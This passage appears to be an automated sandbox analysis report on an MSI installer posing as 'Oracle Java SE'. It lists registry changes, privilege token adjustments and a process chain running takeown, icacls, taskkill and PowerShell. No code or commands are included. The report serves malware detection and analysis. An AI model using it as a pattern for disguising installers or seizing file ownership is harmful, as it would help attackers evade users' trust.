Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\26\52C64B7E C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\95DF787B831D1BC4A87F274A4E182554\ProductIcon = "C:\\Windows\\Installer\\{B787FD59-D138-4CB1-8AF7-72A4E4815245}\\Logo.ico" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\95DF787B831D1BC4A87F274A4E182554\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\95DF787B831D1BC4A87F274A4E182554\Assignment = "1" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\95DF787B831D1BC4A87F274A4E182554\ProductFeature C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\4283AD5241F3747428B68F1D87E32188 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\95DF787B831D1BC4A87F274A4E182554\SourceList\Media C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\95DF787B831D1BC4A87F274A4E182554 C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\95DF787B831D1BC4A87F274A4E182554\Language = "1033" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\95DF787B831D1BC4A87F274A4E182554\Version = "134217999" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\95DF787B831D1BC4A87F274A4E182554\InstanceType = "0" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\95DF787B831D1BC4A87F274A4E182554\AuthorizedLUAApp = "0" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\4283AD5241F3747428B68F1D87E32188\95DF787B831D1BC4A87F274A4E182554 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\95DF787B831D1BC4A87F274A4E182554\SourceList C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\95DF787B831D1BC4A87F274A4E182554\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\95DF787B831D1BC4A87F274A4E182554 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\95DF787B831D1BC4A87F274A4E182554\SourceList\Media\1 = ";" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\95DF787B831D1BC4A87F274A4E182554\PackageCode = "0EBA20D468628E64F92B33D46217DF75" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\95DF787B831D1BC4A87F274A4E182554\AdvertiseFlags = "388" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\95DF787B831D1BC4A87F274A4E182554\DeploymentFlags = "3" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\95DF787B831D1BC4A87F274A4E182554\SourceList\PackageName = "1d2fdd9c09c8452e9c88222f2c16806a_JaffaCakes118.msi" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\95DF787B831D1BC4A87F274A4E182554\SourceList\Net C:\Windows\system32\msiexec.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\95DF787B831D1BC4A87F274A4E182554\Clients = 3a0000000000 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\95DF787B831D1BC4A87F274A4E182554\ProductName = "Oracle Java SE" C:\Windows\system32\msiexec.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeImpersonatePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\syswow64\MsiExec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2976 wrote to memory of 2716 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2976 wrote to memory of 2716 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2976 wrote to memory of 2716 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2976 wrote to memory of 1252 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2976 wrote to memory of 1252 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2976 wrote to memory of 1252 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 1252 wrote to memory of 4324 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\syswow64\cmd.exe
PID 1252 wrote to memory of 4324 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\syswow64\cmd.exe
PID 1252 wrote to memory of 4324 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\syswow64\cmd.exe
PID 4324 wrote to memory of 3488 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\takeown.exe
PID 4324 wrote to memory of 3488 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\takeown.exe
PID 4324 wrote to memory of 3488 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\takeown.exe
PID 4324 wrote to memory of 3260 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\icacls.exe
PID 4324 wrote to memory of 3260 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\icacls.exe
PID 4324 wrote to memory of 3260 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\icacls.exe
PID 4324 wrote to memory of 3512 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 4324 wrote to memory of 3512 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 4324 wrote to memory of 3512 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 4324 wrote to memory of 3504 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\icacls.exe
PID 4324 wrote to memory of 3504 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\icacls.exe
PID 4324 wrote to memory of 3504 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\icacls.exe
PID 4324 wrote to memory of 3752 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4324 wrote to memory of 3752 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4324 wrote to memory of 3752 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4324 wrote to memory of 1712 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4324 wrote to memory of 1712 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4324 wrote to memory of 1712 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4324 wrote to memory of 1876 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 4324 wrote to memory of 1876 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 4324 wrote to memory of 1876 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\cmd.exe
